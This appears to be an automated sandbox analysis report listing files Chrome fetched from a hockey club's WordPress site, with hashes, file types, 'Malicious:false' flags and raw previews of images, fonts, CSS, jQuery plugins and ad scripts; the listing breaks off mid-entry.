                                                                                                                                            Preview:.PNG........IHDR..............0|T..F.IDATx..[l\G..Gq[.j..-.......Q.b....:.=.K.6@#KP..U.!(B&!..i......j.B.$>g...%.(.u..H.T.....P5q..gw......H.b;.b.....f...d.....3C.....B..W.Y..o....c..>k..M$x..L....x"...@..>..N.\..}o>'...Z.=.bd.[c..g.w.9~......!....<E......!....QCd...#_..w.....r7.>...U*..?....u...[G.....wG4....+....X...-.R>.,z:.X.X....c.B%60u).._...g.:......._.[...N...t-.)S.J.g<...:.3.Dv.........T..z.#..y_PL......~.nv.k...Z.#...G..^.D..k...jS..m....Ti.J......*..e _..j.,3j..."..4....#.!sSZ@....RS.K..1.~..d.t.Ra.........T7....L..RK4].....h....\...L./....Q...o.Y-...9.EF.].;!.NS.9.e3..!.2....U..T.'.....%c..IC2.....W.S...v?...MP.{[..7&...t.....p.........V.NF5..J....+5=n%..?T..$.....GK...&..-....3:'(.........}...-...zv2...m.T..V.R.d.Z.......a~.G.xz....M..KT...P....7......X..h<}.d..`.NU;>}|^0k#"S1..^.i..3L.r.9|Os.......S..>V.;.xy4..d...*.Z.|f.pKL.....:.........=.~....;z..n...M.D1.OMC2.L..Sc..f..G.Y..L.&..h&.hX.}m..XW....P.zU..&.....d ..+.i.h.u&B......r....
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (634)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1174
                                                                                                                                            Entropy (8bit):5.74166936214599
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:2FE2B1F17888E326B010A8CDA72D48D3
                                                                                                                                            SHA1:59CBBEEDE4C472024C482BAE8529144119BBBD27
                                                                                                                                            SHA-256:9A9B7FB32E01FD70747F32EFDBD0472FD681C85EEBB0C42D10C7A514820A0062
                                                                                                                                            SHA-512:30BE2E73020EB97A67709E47DED40E999D352DA9B94EDD946D1315BDA65AD616AAA3CDFCFA675D061E4ED4AE1BAE3F0D245908D44411B2425C49B4345D2F6607
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://pagead2.googlesyndication.com/pagead/s/cookie_push_onload.html
                                                                                                                                            Preview:<!DOCTYPE html>.<html>.<head>. <title></title>. <script type="text/javascript">(function(){var f=null,g=null;function l(a){var b="";n(a,function(a){b+=String.fromCharCode(a)});return b}function n(a,b){function c(b){for(;e<a.length;){var c=a.charAt(e++),d=g[c];if(null!=d)return d;if(!/^[\s\xa0]*$/.test(c))throw Error("Unknown base64 encoding at char: "+c);}return b}p();for(var e=0;;){var d=c(-1),m=c(0),h=c(64),k=c(64);if(64===k&&-1===d)break;b(d<<2|m>>4);64!=h&&(b(m<<4&240|h>>2),64!=k&&b(h<<6&192|k))}}.function p(){if(!f){f={};g={};for(var a=0;65>a;a++)f[a]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".charAt(a),g[f[a]]=a,62<=a&&(g["ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.".charAt(a)]=a)}};function q(){for(var a=window.location.hash.substring(1).split(","),b=0;b<a.length;b++){var c=l(a[b]),e=window;e.google_image_requests||(e.google_image_requests=[]);var d=e.document.createElement("img");d.src=c;e.google_image_requests.push(d)}}var r=!1;
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (20032), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):20032
                                                                                                                                            Entropy (8bit):5.050306076043818
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:FFE2C6A04EFB763CBA4BEDF4A521E42B
                                                                                                                                            SHA1:13D040C0C938810D14F212B7770E6E73DC06D840
                                                                                                                                            SHA-256:689D24E87DA59FDDD9115FABF9E7EC6181ECAB061FFC1F1D36EE457FA9EE6A73
                                                                                                                                            SHA-512:5810834521573F084B0DC8882B52B4ABBAC80161CDCD74D1A02D1295E6CDAA1D6D4A62ED2B72682B5FBB3503C122D97F97907AF310604D498F9228542A3870D7
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/sports-leagues/vendor/modaal/modaal.min.js?ver=0.13.6
                                                                                                                                            Preview:!function(_){var i={init:function(a,t){var o=this;o.dom=_("body"),o.$elem=_(t),o.options=_.extend({},_.fn.modaal.options,o.$elem.data(),a),o.xhr=null,o.scope={is_open:!1,id:"modaal_"+(new Date).getTime()+Math.random().toString(16).substring(2),source:o.options.content_source||o.$elem.attr("href")},o.$elem.attr("data-modaal-scope",o.scope.id),o.private_options={active_class:"is_active"},o.lastFocus=null,o.options.is_locked||"confirm"==o.options.type||o.options.hide_close?o.scope.close_btn="":o.scope.close_btn='<button type="button" class="modaal-close" id="modaal-close" aria-label="'+o.options.close_aria_label+'"><span>'+o.options.close_text+"</span></button>","none"===o.options.animation&&(o.options.animation_speed=0,o.options.after_callback_delay=0),_(t).on("click.Modaal",function(a){a.preventDefault(),o.create_modaal(o,a)}),t=!0===o.options.outer_controls?"outer":"inner",o.scope.prev_btn='<button type="button" class="modaal-gallery-control modaal-gallery-prev modaal-gallery-prev-'+t+
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 20144, version 1.0
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):20144
                                                                                                                                            Entropy (8bit):7.988855976137295
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:214F75E42AA5CFCA07257CBF8C64E83C
                                                                                                                                            SHA1:BA4BBE71D4AB266BC145305217CDF86A7777137F
                                                                                                                                            SHA-256:A6760631FECFE59ED152AEB2C51FDCB515AC00CD4755449016B5B34813735D00
                                                                                                                                            SHA-512:E8D896C8C3509941FBCE96E2847838A520B3BC8D94348B1121840A1A2A45328BE939238423A03CDFB7823CF128EEC3190DE8B4C1924553D603EF02FA856217E0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://fonts.gstatic.com/s/roboto/v32/KFOkCnqEu92Fr1Mu51xIIzI.woff2
                                                                                                                                            Preview:wOF2......N........p..NI.............................Z..|.`..J.R..<.....$..}..Z...x.6.$..0. .... ..D.6..r.L......r.....y.B....(j''.L..)A.1.k...DEHA.O,...@..C;..SE.g.ch.{.t..F...?zW....|.r.p..dO1..-.).Q.9.Z......?v..>......).9@."..\}.(.[....I.u......mc...`...#.[.Q!.%B.("!......``c....._....:.u&~......&'.I.x.>..R.......@.4...]|f9V.u.4v.+...E.~=..{+.....]..&X...L...Z..>O.WH...Z..!.T..:..G..1....2.HR....1...U..N....}.D^.:`E.P.:._~....-Qv.....> .t;..[...B.pE.(T.W1...t.........m.....X..F...]i....$.]..e.VSt.NNo......}.=#.B.0.gds....h...ns.Tv..$<_....2F.Kd.;..\.F......B.p)|.%.<[..YJ..l..CP....F..x{...}...f.&..Ci......;...V............./....w...+.I.B.Y...r.........Q...........X.-cL.g3)...a. ..D..w./x.V...Z.`N.25/..)M&...ys../.{E.ezR:V..2V5.+....;....._.[$*J.r....A0tW.u....L........*&T....~.z........10...3%.`%..urP i.9...M.i4M....L...q...N.........%...w.......?7>.........5.!..|8..."N...Y.....E...M|..._N..v{].._..Ex..J.7....aJ;...#u..W...Sk.9...Vn.]......D..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 392x272, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):23545
                                                                                                                                            Entropy (8bit):7.96112287197005
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:DA758346723F50BBDB4151C0CF2BABE0
                                                                                                                                            SHA1:E467769FD9F291559EA29E48FF5D0ABE33FFBB89
                                                                                                                                            SHA-256:6A951F48738470279D5A6AF57EC4412C6AC5D7BF3CE95B31C006067DEB3FF94D
                                                                                                                                            SHA-512:F7E7183D5DEACF65588ECD96606A8DA1B4476AFD02A7DBADAC575BEFB86FC797DFF68CCA5D5E3F6F9F05482F001281A924F3C6EF3ABA0096A100FE3653C0FED3
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100...........................................C...............................!..!..)1(%(1)I9339ITGCGTf[[f.z.......C...............................!..!..)1(%(1)I9339ITGCGTf[[f.z...............".................................................................................F....?$>.s..8wt.6.{w.:Pv*nc\..<..N.I.Twi.1..ealE......T....!m...C....l.t.......iCt"l.k.:\.\m."Y{L.E...E.f@T..E....sV.1,...K.l....Zr..+..F.y...'x....aCc%j.M.Z...>...1.....A.........:8...y:4..k......[F..N?7#.i........kZ.,..q......7a..OD.K_.:...y...[y...J.W.6.......U.....#5.%G.....9..`6........2.,u....k.!.G...F..k=...z.u2d.>.h.....$....Cb...=G.....(\x.......T.i.$....]1O...2..2Z.7J]a..:.a.63...!.T.x..y63V.i_"D...9.j.o;.X...GjlwX.zx.H..z.^..A..=..&.D.h..9...........Fu.....-".BD..+3..D..)s.....[.y.*B\.3`*.f........i...a ..1'...3Z........eg.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (5064), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):5064
                                                                                                                                            Entropy (8bit):4.893189910695674
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:216D791E61641ACE57D8D11A12BDE01E
                                                                                                                                            SHA1:28BDE6D98D1C689A712EFE037A9592E9FA103B09
                                                                                                                                            SHA-256:029DEDF319BC4536D9C663AE9C0B10C95D1E9F5DD1DE0AA73172E9E89AE254CC
                                                                                                                                            SHA-512:CD31993E3719A13C971386CBCA73AE88CB95E0833F2E8D9CD8FF9E0D070CEE43589A4DC34FD973A9E2001AEEEB0EA9CF44E96B7536F85F2A31A47F33E6C9FAC8
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/cookie-notice/css/front.min.css?ver=2.5.5
                                                                                                                                            Preview:#cookie-notice,#cookie-notice .cn-button:not(.cn-button-custom){font-family:-apple-system,BlinkMacSystemFont,Arial,Roboto,"Helvetica Neue",sans-serif;font-weight:400;font-size:13px;text-align:center}#cookie-notice{position:fixed;min-width:100%;height:auto;z-index:100000;letter-spacing:0;line-height:20px;left:0}#cookie-notice,#cookie-notice *{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}#cookie-notice.cn-animated{-webkit-animation-duration:.5s!important;animation-duration:.5s!important;-webkit-animation-fill-mode:both;animation-fill-mode:both}#cookie-notice.cn-animated.cn-effect-none{-webkit-animation-duration:1ms!important;animation-duration:1ms!important}#cookie-notice .cookie-notice-container,#cookie-notice .cookie-revoke-container{display:block}#cookie-notice.cookie-notice-hidden .cookie-notice-container,#cookie-notice.cookie-revoke-hidden .cookie-revoke-container{display:none}.cn-position-top{top:0}.cn-position-bottom{bottom:0}.cookie-notice-contai
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):2806
                                                                                                                                            Entropy (8bit):7.797400868397926
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:8944A5AE56C90A627CAC1C022562751C
                                                                                                                                            SHA1:C03E5F077D4060F59A69F52A79279340944D481F
                                                                                                                                            SHA-256:340746A22B7598C79E3297E655540FE4B9659D55711764970D12312DC8C5F96D
                                                                                                                                            SHA-512:058C653C2A05E521983E4A36037146CB39D7E88BF82AEA8E882C8B3F86B0D2A385E6C5C6994992E2AED57377CCE89784B01A0D44DC6504B5321668CB7CC593E8
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:130/h:90/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2025/01/IMG_8016.jpg
                                                                                                                                            Preview:RIFF....WEBPVP8X...........Y..VP8 .....,...*..Z.>.@.I...!+......f.@.....hm.Fb...Sm....A.s..x.......q..|..Je......px.W....@......z..+...c....{Qg..\...w....R..i...._...?=...c@h....o/...X."....A)D....,...>./.....O........:...j_.D..9:V}.ES.#)......sb.j.R........p.)=........(.+.T..w....b.q.gQ....qFj.......b........^....4.66. ..T.........0.....J.wCc.o..>:{=A...lfG..J|...{.l..Y.n..M..........)go..E...?C..h9...U'.5.Z\..H..-/.....X.......Y....../w....5.hw.8`s.?H...z...+.}L.....G8O;..m4.T....uO..v....%...[0I..K.s...........?d....F..`..!..V..._....sr.5......f....F(.'..&.W'.....|.l."..8.qj...|w.....@.N..Kf.L.....#.d.{..5...|.....9..t.C.L...h......+..).@.u...[....8..A\-. .t....|.'q..c......nFs.)."...u2..Y..Bg8.x..Jv^~.U|s.. ...|.u.do......6.....,..W...P.J....]....:...*?7........A|.v|O....D.+...K..s..f.?.@....8.s..[Q"...[.+W..[z....U.a..8..{...5|...........a.A.b'<.(.........:8.}....W./..L.6H{.O..K-..Sr ....V...GN<V.Z.\rZ..J.{...._.....!...XG..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (8857)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):8858
                                                                                                                                            Entropy (8bit):4.5024046796666495
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:F58316E9B2D53BEFB4986B2CE25FE067
                                                                                                                                            SHA1:AA5EE777A207C90862927E04F164501653E6C6AF
                                                                                                                                            SHA-256:C9113A1BDCFE16115ABCC7C453812C94C6FA018FEC8AFE493A04BB8063A8491F
                                                                                                                                            SHA-512:AECA67C13D2293321BE64E9F3B67A8A087EDF77F7B9F7DA9D5ED6BC94FCA836319BED6A93F7A4BC0A3329FA5ED1C31CD4F903BA77574E297D9305A361F056618
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/social-icons-widget-by-wpzoom/block/dist/style-wpzoom-social-icons.css?ver=4.3.4
                                                                                                                                            Preview:.wp-block-wpzoom-blocks-social-icons{margin:0 auto;display:flex;box-sizing:content-box;flex-flow:row wrap;justify-content:var(--wpz-social-icons-alignment)}.wp-block-wpzoom-blocks-social-icons:not(.is-style-with-label-canvas-rounded):not(.is-style-without-canvas-with-label).show-icon-labels-style{display:-ms-grid;display:grid}.wp-block-wpzoom-blocks-social-icons a.social-icon-link{text-decoration:none !important;box-shadow:none;transition:opacity .2s ease}.wp-block-wpzoom-blocks-social-icons a.social-icon-link:hover{opacity:.8}.wp-block-wpzoom-blocks-social-icons .social-icon.socicon,.wp-block-wpzoom-blocks-social-icons .social-icon.dashicons,.wp-block-wpzoom-blocks-social-icons .social-icon.genericon,.wp-block-wpzoom-blocks-social-icons .social-icon.academicons,.wp-block-wpzoom-blocks-social-icons .social-icon.fas,.wp-block-wpzoom-blocks-social-icons .social-icon.fab,.wp-block-wpzoom-blocks-social-icons .social-icon.far{color:#fff;padding:10px;margin:5px;background:#5a5a59;font-size:1
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):28622
                                                                                                                                            Entropy (8bit):7.990196786928411
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:5064119DF844935D4EFCC2518BB6BC8D
                                                                                                                                            SHA1:9F655FEC365C806007F3142F596CEE7AE0C24CA4
                                                                                                                                            SHA-256:95430ED65F58BF24619F2E5EFF7DB0815F387F78B6DE1A4D6DBA8BEF0CE36EA9
                                                                                                                                            SHA-512:A69F7E14B8C16C58483260A2A87019F33E51571C441B0AC0469CC1A963A5BB5450C47DE040D18574F7EF50325D73E032D5754F956B17EC89C4EAD523376EF3F3
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:600/h:417/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2023/09/IMG_5111.jpg
                                                                                                                                            Preview:RIFF.o..WEBPVP8X........W.....VP8 .n..P....*X...>.F.J...)....0..M.=[....Y...F...`....`58.v7.x..?..b.f..L+>..<o.........>...X..x....|.:[.o..............Q.....'.....?v..~.?....K........+.w...Nq./..K...?A.E...w......~j......k..x'...>.>..B........o......'..B?.x.....G...~.z1z..G........SQ....1bX.e.*..^..........GP.5...............w?.....1o.%N...]...].-..<o;..'.5...Z..<2V......).o.;.Q..[....q.Y...*...i1...}.f y..m....'bm.I.Xzm....q..Z..{#.fg....Pg.|..>i.......H.?...4.E~..:..9.K..x:iC..qP...:c.... ......E.,+,F.d.9.X.VDL.b....9.?m.\.!..X.F..gc...cd./...y......a.....]wd...[X'.H1..C.<....w...s.lj.....T...P....].$.......Xh.r...........t.o.J.)`.>.kN....(?#.Z.....x...[........8..~u.f0&..:.n....6../Ib.*..LV.8.uI..,...u@...........6..:.....'.....!.` @j..t2.#j...<_.ytaC.o.4.._&..P3........%og..G.q....J4..D:b...7R.....:..T..A...M.N...\h......'5j.\...`..4.C...M&..h..._wdXYA..c\;..F..`...O.\.+Q..]../.,.........`.......a.{.S.";..i8.V..P..O1..x.....87.I
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):10800
                                                                                                                                            Entropy (8bit):7.970006771221797
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:DC16C4FDCF60859B60AB9B3C2ACA622E
                                                                                                                                            SHA1:FFDABA6D41B138966D6E9A42421FAE1EAFEE98BF
                                                                                                                                            SHA-256:14D92DBB9E27D6D9461D88C03399F37C702C50F944EFFA961F829A22B47A1460
                                                                                                                                            SHA-512:BB98C3E6C29C460AB9AF9802315081474965704261439E894F0753511C5CAB090F090D3CAD222914B1275C7BA2181153C2EC0FFF97DC39347574503EA8DB993C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:392/h:272/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2025/01/IMG_8016.jpg
                                                                                                                                            Preview:RIFF(*..WEBPVP8X..............VP8 H).......*....>.D.K%..*(v.....M....wA......y..77....z...../.........o....v./.........}9<.....zM........Z..W...O....>.7M<S...Y.8...|...W....L..gK....~n.g...`....j.~..o.7.......=j.y}..~{..v.n<.....r.^#....RO.....J...\d...-.......$.6N.....DA...`.1./i.N...Q#C.G$4.4... (.q.....hU.>.....-o.!Fe..q.E]2.8.Nb."d...Zyu.3.P-v...x_.K..Qp....oS&6....Ul....RT....J.....(..^.`...U..{C...(D..Bh28dU0..3Q.......'..y..;...M.5......R)....&...~.}.@.acpc..%....K.,......Bi...{$r.\...;..t ,.....]ft.&<.{..G1.wQ.......b.>.0f...^y../@...4...o6.7...b.ez.a.....Q}{.....:5..b.9[...}.=..#......G..w...U.\...1.1......z.v=...S8^.K....m.gO(._-N,..0........#f.....{...8..0..].T!.w...d!..ih.0p.T..1.]*.W.I.w-[/<.I...C..S.}.{2.rh..2..6.Y]Z.AF........&,..../....U...../.............P...>..U..A\{..n.r..D.\C....X....Q...<.=.>AJVP.wc....n.....E..._<.).J3V.....ACL....O).."....z.S.'Yy.C.wG6...........$...xhV} .l.8I7.O...o9]..#.2..:Q...z@
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 392x272, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):28583
                                                                                                                                            Entropy (8bit):7.973461422976105
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:4F0FEC14BD797C3630C07A075F3C1B13
                                                                                                                                            SHA1:9FF4D4F9CC99D91CCB7ACDB138028F1538C2D87E
                                                                                                                                            SHA-256:E5DDB3C055D2E1337CA18F488789F48962C7E4DED3B6760316FB223E9029FD2B
                                                                                                                                            SHA-512:7B93D240FDBAB4FB7BDBF54ADEC7CBC77F5A38D99E4B809E7959B59D08B47D14FF4B5E8C91328AE98B4E666367620A0C58D9D7F691DF82C7514B42A3A1148B72
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100...........................................C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||............".................................................................................}AwF.H.j...0..KFq. ..$-a[ .....a.XM'.:..'H...PFIt<`5Mkk.q..._....U..fq..wc.#k.....O$..n...!Q.......P......^m.=...TJ=..y.*~..#.Zt[.:.K..*.-8.1.1.MU.. .+kt..........AN#.tv...+k%5....JH@.W5R.z...w.+...-.&...Z..f"....i.6.tS.....I7.AL_".u*a..K.@.,.UUo..i.....%..4O.uMe..=...J..\10.):.\P.3.b_.ZC.6!..C+q..LF.f....e.o.......I.ag41...j.d.2]...Jj..:,.......l...Ld+._x_..G+@!../>,...Zv9,(...........}..)]...|.`F....B....y.`...J.+.].-...\[.!I/z.....u6E....aa.r......iLzC.:.I.!..K+.....0.+.c{....9.yOCr,)...8.8=....g.......,..PI....z..%.#+.m...fuI.....1.e...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):13
                                                                                                                                            Entropy (8bit):2.7773627950641693
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                            SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                            SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                            SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://td.doubleclick.net/td/ga/rul?tid=G-722EJY2GMM&gacid=375369631.1736177761&gtm=45je4cc1v9109071687za200&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067555~102067808~102081485~102198178&z=592647035
                                                                                                                                            Preview:<html></html>
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):635
                                                                                                                                            Entropy (8bit):4.9590750416303955
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:E85462B7B7BD9FF2F88E0DA1E0A592C4
                                                                                                                                            SHA1:5110F67F1089B5C65713CA1B6E6EDF752D7731AB
                                                                                                                                            SHA-256:4EC8F4607D1F44406615EFF8E00190A3221EAAB8237F7F17B23025F76ABA4C24
                                                                                                                                            SHA-512:B47558C1D239EC7DDEEE344D4E21BE2EBFB08B046743A1970CB814623F00C5F8CA493973B37B015DD6465BA76A97186C36093B5438360330C32A4A718FD424AF
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:{"fr":"false","brandSafety":{"adt":"veryLow","alc":"veryLow","dlm":"veryLow","drg":"veryLow","hat":"veryLow","off":"veryLow","vio":"veryLow"},"slots":{"myFakeSlot":{"id":"15c52a36-cc44-11ef-8dd9-0a2e65fba67f"},"div-ad-gds-3961-3":{"id":"15c52a39-cc44-11ef-8dd9-0a2e65fba67f"},"div-ad-gds-3961-1":{"id":"15c52a3b-cc44-11ef-8dd9-0a2e65fba67f"},"div-ad-gds-3961-2":{"id":"15c52a38-cc44-11ef-8dd9-0a2e65fba67f"},"div-ad-gds-3961-1_2":{"id":"15c52a3a-cc44-11ef-8dd9-0a2e65fba67f"},"div-ad-gds-3961-1_1":{"id":"15c52a37-cc44-11ef-8dd9-0a2e65fba67f"}},"custom":{"ias-kw":["IAS_3007987_PG","IAS_1510294_PG","IAS_3010460_PG","IAS_3010248_PG"]}}
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 32 x 32, 8-bit colormap, interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1163
                                                                                                                                            Entropy (8bit):7.034028528646635
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:712E43C60CAD7F9BA90C44DC3CE1A844
                                                                                                                                            SHA1:6213BA7ACD4EA9F59528C001E038F221B86B58D8
                                                                                                                                            SHA-256:69B6B037C4F3DEE9478327E4130E03608B57F10A80C7B5BCCB31188901DF2DEE
                                                                                                                                            SHA-512:2AFB211D7A24C36D038A1560C7DE5CD04F8B22B0059D895F719700E8C238AB804D4E49855750CB49FA28070265DF5E98E4375D19A3E1CD9CF5A1A9E472D98562
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:.PNG........IHDR... ... .....3..P....PLTE............................................l.[i.iu....._........'..0..m..f..... ..b....:K%%}...''}''~./A.);.,>..h..m..i.Xe;;.pp.aa..fs.t..Ra33...@.6G.0B!!y!!{..wBB....rr.qr.yy.jj..o{.~..$677.dd.VV.**.<<.33..9K..o..g..&..+.&8..t.....!FF..9JWW.KK.JK..P_.\j..d.GW.BS..'..a..m..(.....`..n..)rq...n..k..%..$..(.!3..p.DD.GG......*..i..l..h........%...//.II.>>..EU.O^.@Q..j..#..m.w..v..v...\i@@..N].L\.bp..#oy......tRNS......... $'DY..%.....pHYs.................eXIfII*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100.................... ........... .........._....IDATx...Ws.P....^6...HT..*Z@A.8D j0..P...h......U.uG...0|.;....y...A..i.....9..l......`.$........^.....'..;.IN%...1...<jr.]|.w-y...u. ~3.A...(..:U.T*i.P(..@...R)-....A.\..l..V..Z..Y....m.....R..i.._.......G..|.<....|.8.d.......t..I.$.....b..............^.z.'....m0.q..'..5..........Q.....?.x...3?...@
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (12198), with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12198
                                                                                                                                            Entropy (8bit):5.031745242580206
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:3819C3569DA71DAEC283A75483735F7E
                                                                                                                                            SHA1:ECD40A5CC6F0B76200C454CA880210DC301CFAB8
                                                                                                                                            SHA-256:214674CC77ABA35AB3567B88E2739FD08E8E96C61D279559AD61874069683EA0
                                                                                                                                            SHA-512:2710655DFF46653DAEB3A6E3F6D36F885E51D5B375738EE353ACA40C6F66AE1A7DECE57039D58747012ED9EA2822191143C06F270123B8CC580F6A41B8E8AEF4
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:!function(){"use strict";function Waypoint(options){if(!options)throw new Error("No options passed to Waypoint constructor");if(!options.element)throw new Error("No element option passed to Waypoint constructor");if(!options.handler)throw new Error("No handler option passed to Waypoint constructor");this.key="waypoint-"+keyCounter,this.options=Waypoint.Adapter.extend({},Waypoint.defaults,options),this.element=this.options.element,this.adapter=new Waypoint.Adapter(this.element),this.callback=options.handler,this.axis=this.options.horizontal?"horizontal":"vertical",this.enabled=this.options.enabled,this.triggerPoint=null,this.group=Waypoint.Group.findOrCreate({name:this.options.group,axis:this.axis}),this.context=Waypoint.Context.findOrCreateByElement(this.options.context),Waypoint.offsetAliases[this.options.offset]&&(this.options.offset=Waypoint.offsetAliases[this.options.offset]),this.group.add(this),this.context.add(this),allWaypoints[this.key]=this,keyCounter+=1}var keyCounter=0,allW
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):3510
                                                                                                                                            Entropy (8bit):7.8582008448066425
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:DCA62EE0EBD37ABB67B2105A521FBE60
                                                                                                                                            SHA1:E59C55AB5E3EF24D1E6812AFBCD5D4A31845D950
                                                                                                                                            SHA-256:661EBEB2020467DEBB6DA1690F30857743D8747EF94F61609318164D54BA4705
